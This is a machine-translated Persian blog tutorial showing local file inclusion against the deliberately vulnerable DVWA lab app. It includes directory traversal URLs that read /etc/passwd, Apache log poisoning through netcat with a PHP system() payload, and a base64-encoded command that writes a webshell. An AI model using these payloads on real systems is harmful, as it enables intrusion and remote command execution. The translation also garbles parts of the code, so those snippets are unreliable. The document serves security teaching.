لعنت نرم افزار های آسیب پذیر وب سایت وب سایت - محلی ورود فایل (LFI)
نویسنده:
اشفق انصاری

نقد و مرور:
رتبه:
5
بر مارس 18, 2013
تاریخ و زمان آخرین اصلاح شده:مارس 18, 2013

خلاصه:

محلی ورود فایل (LFI) یک نوع از آسیب پذیری اغلب بر روی وب سایت یافت شده. این اجازه می دهد تا حمله به یک فایل محلی, معمولا از طریق یک اسکریپت بر روی وب سرور. این آسیب پذیری رخ می دهد به دلیل به استفاده از ورودی کاربر را بدون اعتبار سنجی مناسب.

معرفی

 

در بخش اول لعنت نرم افزار های آسیب پذیر وب سایت وب سایت (DVWA) سلسله, ما را دیده اند، چگونه ما می توانیم نصب لعنت برنامه آسیب پذیر تحت وب (DVWA) بر رد گم کردن 5 R1.
 

اگر شما قسمت اول را نمی خواند, در اینجا لینک: HTTP://قلم تست hacksys.vfreaks.com / / لعنتی آسیب پذیر-WEB-نرم افزار-SQL-injection.html

 

اکنون, ما یکی دیگر از بردار حمله شناخته شده به عنوان تست محلی ورود فایل (LFI).
 

محلی ورود فایل (LFI) یک نوع از آسیب پذیری اغلب بر روی وب سایت یافت شده. این اجازه می دهد تا حمله به یک فایل محلی, معمولا از طریق یک اسکریپت بر روی وب سرور.
 

این آسیب پذیری رخ می دهد به دلیل به استفاده از ورودی کاربر را بدون اعتبار سنجی مناسب. این می تواند به چیزی به عنوان حداقل به عنوان خروجی از محتویات فایل منجر شود, اما بسته به شدت, به لیست چند آن می تواند منجر به:
 


1. اجرای کد بر روی وب سرور.
2. اجرای کد سمت کلاینت مانند جاوا اسکریپت است که می تواند منجر به حملات دیگر مانند صلیب سایت اسکریپتی (XSS).
3. محرومیت از سرویس (داس).
4. سرقت اطلاعات و دستکاری داده ها.

 

اکنون, ایده پشت محلی ورود فایل (LFI) بردار حمله این است که, آن را اجازه می دهد تا حمله به فایل های محلی بر روی وب سرور با استفاده از اسکریپت وب آسیب پذیر، اگر وب سرور است که اجازه دسترسی به آن را.
 

همه شما باید به فکر “یک معامله بزرگ در آن چه خبر?”.
 

خوب, من باید بگویم که این یک مسئله بسیار شدید است اگر وب سرور به درستی پیکربندی نشده.
 

بیایید, در نظر بگیرید که یک مهاجم قادر به شامل فایل های محلی بر روی وب سرور از طریق آسیب پذیر اسکریپت پی اچ پی. این بدان معنی است که او قادر خواهد بود به اجرای هیچ کد پی اچ پی است که در فایل است که شامل وجود دارد.
 

اکنون, برخی از شما باید به فکر “استفاده از اجرای اسکریپت های پی اچ پی از جمله فایل های محلی زمانی که آن را نشانی از یک هکر برای به دست آوردن دسترسی چیست?”.
 

سرور HTTP آپاچی انواع مکانیزم های مختلف را فراهم می کند برای ورود به سیستم هر چیزی که اتفاق می افتد بر روی وب سرور, از درخواست اولیه, از طریق فرآیند نگاشت URL, به وضوح نهایی اتصال, از جمله هر گونه خطایی که ممکن است در این روند رخ داده است.
 

در اینجا یک قطعه هشدار امنیتی موجود در صفحه مستندات آپاچی HTTP سرور.
 

پیوند: http://httpd.apache.org/docs/2.4/logs.html
 

امنیت هشدار: هر کس که می تواند به دایرکتوری که در آن HTTPD آپاچی در حال نوشتن یک فایل ارسال تقریبا به طور قطع می تواند دسترسی به UID به دست آورید که سرور به عنوان آغاز شده, است که به طور معمول ریشه. نکنید به مردم ارسال به دایرکتوری دسترسی سیاهههای مربوط در بدون آگاهی از عواقب ذخیره می شود. امنیتی سند راهنمایی برای جزئیات بیشتر را ببینید. بعلاوه, فایل های ورود به سیستم ممکن است حاوی اطلاعات به طور مستقیم توسط مشتری عرضه, بدون فرار. از این رو, این امکان وجود دارد برای مشتریان مخرب به قرار دادن کنترل کاراکتر در فایل های ورود به سیستم, بنابراین باید دقت شود در برخورد با یادداشت های خام گرفته شده.

 

برای اطلاع شما, به رد گم کردن 5 R1, the ورود به سیستم سرور HTTP آپاچی فایل در واقع:
 

/var / ورود / apache2 برای نصب apache / access.log

/var/log/apache2/error.log


 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) ورود به مسیر فایل
 

شما در حال حاضر هشدار امنیتی فوق در مورد ورود به سیستم مجوزهای دایرکتوری به عنوان خوانده شده. اگر حمله موفقیت آمیز باشد در پیدا کردن مسیر فایل ورود به سیستم با استفاده از دایرکتوری پیمایش حمله, او می تواند از این ورود به سیستم با نوشتن کدهای مخرب در فایل های ورود به سیستم را مسموم, اگر “ورود به سیستم” مجوزهای فایل و دایرکتوری ها به درستی پیکربندی نشده.
 

ما خواهد دید که چگونه ما می توانیم سم the ورود به سیستم فایل در قسمت بعد از این پست.
 

مسلح با اطلاعات عمومی درباره محلی ورود فایل (LFI), اجازه ادامه و تجربه آن را در جلسه عملی.
 

یادداشت: در رد گم کردن 5 R1, the “access.log” فایل اجازه دسترسی “دیگران” است را به “ممنوع”.

 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) ورود به سیستم فایل اجازه
 

اکنون, اجازه دهید “آیا می توانم به عنوان خوانده شده” اجازه دسترسی به “دیگران”.
 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) خوانده شده اجازه ورود فایل
 

ما در حال تنظیم “آیا می توانم به عنوان خوانده شده” اجازه به طوری که ما قادر به نشان دادن محلی ورود فایل (LFI) حمله با استفاده از بردار لعنت برنامه آسیب پذیر تحت وب (DVWA).
 

ایجاد مجموعه و برو.

 

بیایید ورود به لعنت برنامه آسیب پذیر تحت وب (DVWA) و تنظیم امنیت سطح به سطح کم.
 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) امنیت به پایین
 

با کلیک بر روی ورود فایل.
 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) ورود به مطالعه است Tab فایل
 

HTTP://192.168.96.128/آسیب پذیری dvwa / / /?صفحه = include.php

 

که شامل یک فایل را ویرایش کنید ?صفحه = اضافه کردن به مسیر در URL تعیین شده است که شامل فایل.
 

بیایید تایید اینکه آیا URL بالا است که واقعا در معرض خطر محلی ورود فایل.
 

ما انجام خواهد داد پیمایش دایرکتوری و سعی کنید که شامل /غیره / passwd پرونده. اگر گنجاندن موفق است, ما محتوای /غیره / passwd نمایش داده شده در صفحه وب.
 

HTTP://192.168.96.128/آسیب پذیری dvwa / / /?صفحه = .. / .. / .. / .. / .. / و غیره / passwd

 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) /etc/passwd Inclusion
 

که به نظر می رسد خوب! ما قادر به شامل بودند /غیره / passwd فایل را در لعنت برنامه آسیب پذیر تحت وب (DVWA) موفقیت به عنوان صفحه وب تا به محتوای کامل نمایش داده /غیره / passwd پرونده.
 

کار بعدی ما این است که سعی کنید که شامل ورود به سیستم فایل آپاچی. دوباره, ما استفاده خواهد کرد پیمایش دایرکتوری و سعی کنید که شامل /var / ورود / apache2 برای نصب apache / access.log پرونده.
 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) Access Log Inclusion
 

HTTP://192.168.96.128/آسیب پذیری dvwa / / /?صفحه = .. / .. / .. / .. / ورود / apache2 برای نصب apache / access.log

 

چیز جالب! این روز برای ما خوب است. همه چیز در حال کار کردن در یک راه خوب. آپاچی سرور وب access.log فایل با موفقیت شامل. این نشانه خوبی است که در حال حاضر, می تواند نسبت به ما سر کنید و سعی کنید به سم the ورود به سیستم خطا آپاچی.
 

یادداشت: همانطور که من شده اند با استفاده از این رد گم کردن 5 R1 پس از یک سال. من به روشن کردن access.log و error.log به طوری که من قادر هستم بخش مسموم از فایل های ورود به سیستم را به شما نشان می دهد به آسانی.    

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) پاک کردن سیاههها

ما آماده هستند تا سم the access.log پرونده. این گام مهمی است که این کمک خواهد کرد که مهاجم به access.log فایل و اجرای مسموم کد پی اچ پی که خواهد شد به نوشته access.log فایل در این مرحله. مسمومیت را می توان توسط چک کردن محتویات تایید است error.log پرونده.
 

باز کردن یک پایانه و اتصال به وب سرور آپاچی بر روی پورت 80 با استفاده از راحت.
 

1
2
3
ریشه @ BT:~ # NC 192.168.96.128 80

GET /hazStart<?سیستم پی اچ پی(base64_decode($_GET[a]));?>HTTP hazEnd/1.1

 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) سیاهههای مربوط به سم
 

اکنون, اجازه می دهد تا تایید اینکه آیا مسمومیت موفقیت آمیز بود. برای این کار, ما هر دو باز access.log و error.log فایل کنید و سعی کنید به درک نوشته.
 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) سیاهههای مربوط به سم
 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) سیاهههای مربوط به سم
 

سرد! ما باید فایل های ورود مسموم شده. هر چیزی که تا به عنوان انتظار می رود کار کرده است.
 

یادداشت: ما در حال حاضر یک پوسته مینی پی اچ پی نوشته شده است access.log ورود به سیستم فایل. در حال حاضر انگیزه بعدی ما این است که به ارسال یکی دیگر از مینی پوسته پی اچ پی در ریشه وب سرور میزبانی لعنت برنامه وب آسیب پذیر (DVWA).

 

در اینجا از دستور است که پوسته مینی پی اچ پی بر روی وب سرور ارسال شده است.
 

1
پژواک "<?سیستم پی اچ پی(base64_decode($_GET['P'])); ?>" > ../../webshell.php

 

اگر شما به یاد داشته باشید پوسته پی اچ پی مینی اسکریپت است که ما در تزریق access.log پرونده, کد اسکریپت پوسته زیر آورده شده است:
 

1
<?پی اچ پی سیستم(base64_decode($_GET['A'])); ?>

 

می تواند شما را پس از به دنبال کد اسکریپت پوسته گام بعدی که ما باید انجام دهیم حدس بزنید?
 

خوب, در حال حاضر ما دستور رمز به نوشتن مینی پی اچ پی اسکریپت پوسته به ریشه وب سرور با استفاده از الگوریتم رمزگذاری از base64.
 

در اینجا این است که یک برنامه پایتون ساده از base64 را رمزگذاری یک رشته:
 

1
2
3
4
5
#!/usr / بن / پایتون

base64encodedstr = """echo "<?سیستم پی اچ پی(base64_decode($_GET['P'])); ?>" > ../../webshell.php"""

چاپ "\Nرشته رمزنگاری شده: " + base64encodedstr.رمزی کردن('از base64',"شدید") + "\N"

 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) Base64 Encode
 

The از base64 کد گذاری رشته زیر آورده شده است:
 

1
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=

 

این است برای رفتن به آخرین مرحله قبل از ما با یک پوسته استقبال. 🙂
 

ما به حرکت خواهد کرد URL در زیر آورده شده برای نوشتن مینی پی اچ پی اسکریپت پوسته به وب روت سرور.

HTTP://192.168.96.128/آسیب پذیری dvwa / / /?صفحه = .. / .. / .. / .. / ورود / apache2 برای نصب apache / access.log?= ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA / PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA =

 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) PHP Web Shell
 

سرانجام!! ما آن را با موفقیت انجام می شود. ما آپلود پوسته پی اچ پی مینی با استفاده از محلی آسیب پذیری فایل ورود به مطالعه به لعنت برنامه آسیب پذیر تحت وب (DVWA).
 

من دوست دارم اتوماسیون و این به این دلیل است که من عاشق پایتون. پایتون به شما قدرت بسیار خوبی برای به انجام رساندن کارهای پیچیده بسیار ساده.
 

من یک اسکریپت پایتون نوشته شده اند که ما نوشت به طور خودکار بهره برداری از محلی ورود فایل (LFI) به لعنت برنامه آسیب پذیر تحت وب (DVWA).
 

لعنت برنامه آسیب پذیر تحت وب - محلی ورود فایل (LFI) بهره برداری از اسکریپت
 

به عنوان طول اسکریپت بهره برداری است بسیار بزرگ, من تمام اسکریپت های مورد استفاده در این ارسال زیپ شده و برای دانلود در دسترس است.
 

دانلود لعنت برنامه آسیب پذیر تحت وب – محلی ورود فایل (LFI) ارسال مواد:
 

DVWA - LFI اسکریپت بهره برداری
3.9 KIB
644 دانلود
اطلاعات بیشتر...

 

با تشکر از شما برای گرفتن وقت خود را به خواندن این پست. من امیدوارم که این به شما کمک می کند تا. لطفا احساس آزاد به ترک نظر اگر شما هر گونه شک و تردید و یا اگر می خواهید به بحث در مورد هر چیزی در مورد محلی ورود فایل (LFI).
 

46,417 نمایش کل, 28 بازدید های امروز

دو زبانه زیر محتوای زیر تغییر.

اشفق انصاری

محقق امنیتی
اشفق انصاری بنیانگذار است HackSys تیم کد نام "Panthera". او یک محقق امنیتی با تجربه در جنبه های مختلف امنیت اطلاعات می باشد. او نویسنده "HackSys افراطی درایور آسیب پذیر" و "شل کد از مرگ". او همچنین نوشته شده است و whitepapers مختلف در سطح پایین بهره برداری نرم افزار منتشر شده. علاقه او نهفته در هسته "بهره برداری سطح پایین", "مهندسی معکوس", "تجزیه و تحلیل برنامه" و "ترکیبی fuzzing در". او fanboy هوش مصنوعی و یادگیری ماشین است. او به فصل برای است تهی پونا.

2 پاسخ به “لعنت نرم افزار های آسیب پذیر وب سایت وب سایت - محلی ورود فایل (LFI)”

  1. آیا امکان آن وجود برای نشان دادن این حمله را بدون اجازه خواندن در access.log. به عبارت دیگر ترک مجموعه ای اجازه ممنوع? از آنجا که اکثر سرورها ممکن است این مجموعه در وهله اول باید. می تواند به شدت استقبال مینماید.

    • سلام KC,

      متاسفانه, ورود به سیستم فایل نیاز به به عنوان خوانده شده اجازه بر access.log.

      مگر اینکه, ما قادر به خواندن فایل, ما نمی خواهد قادر به انجام این حمله.

      اما, شما ممکن است سعی بردارهای حمله مختلف.

      تشکر.

پاسخ دهید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخشهای موردنیاز علامتگذاری شدهاند *